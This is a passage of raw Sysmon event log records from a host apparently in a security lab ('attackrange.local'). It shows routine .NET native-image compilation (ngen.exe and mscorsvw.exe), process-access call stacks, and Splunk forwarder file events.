2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:42.772{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F603-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.756{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F603-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:42.756{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F603-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.740{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6EF10551835EE6D9A064A7513EED59B,SHA256=A95EE36D40501279941CC786EE58947FC812999033A23F936534DED9C819B79A,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000020983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:42.725{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ae4-0\Microsoft.Windows.HostGuardianService.Plugin.dll2021-06-23 21:04:42.725 10341000x800000000000000020982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.584{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:42.584{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.459{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0688E0F6F68DC071236C824CD3BAAD5F,SHA256=EF2E3D789E4414AA1641F0F7E5261B3021CE80366D2C78F7521F11D03862D474,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.459{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F403-00000000CF01}1768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.381{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F403-00000000CF01}1768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:42.365{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F403-00000000CF01}1768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:42.334{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b54-0\Microsoft.Windows.FileServer.Management.ServerManagerProxy.dll2021-06-23 21:04:42.334 10341000x800000000000000020974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:42.022{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.990{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:41.990{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.865{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6B211C9CA900664CC7CC6EA16DD6553,SHA256=4C155E14E8052B2C7F33C5760DA95D1CE40B2C56B01A4C2EF33BD59B3C00F333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.522{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC663DE9AF98071979D392EE52A2CF7E,SHA256=74C776DE0579186F7C7D5129FFC772948B429BF8719F4B338A7F74DA3840AE93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.397{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.365{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.365{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.256{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-FA03-00000000CF01}6260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.225{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-FA03-00000000CF01}6260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.225{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-FA03-00000000CF01}6260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:43.193{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f78-0\Microsoft.Windows.ServerManager.BitLocker.Plugin.dll2021-06-23 21:04:43.193 10341000x800000000000000020997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.116{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.084{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.084{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.d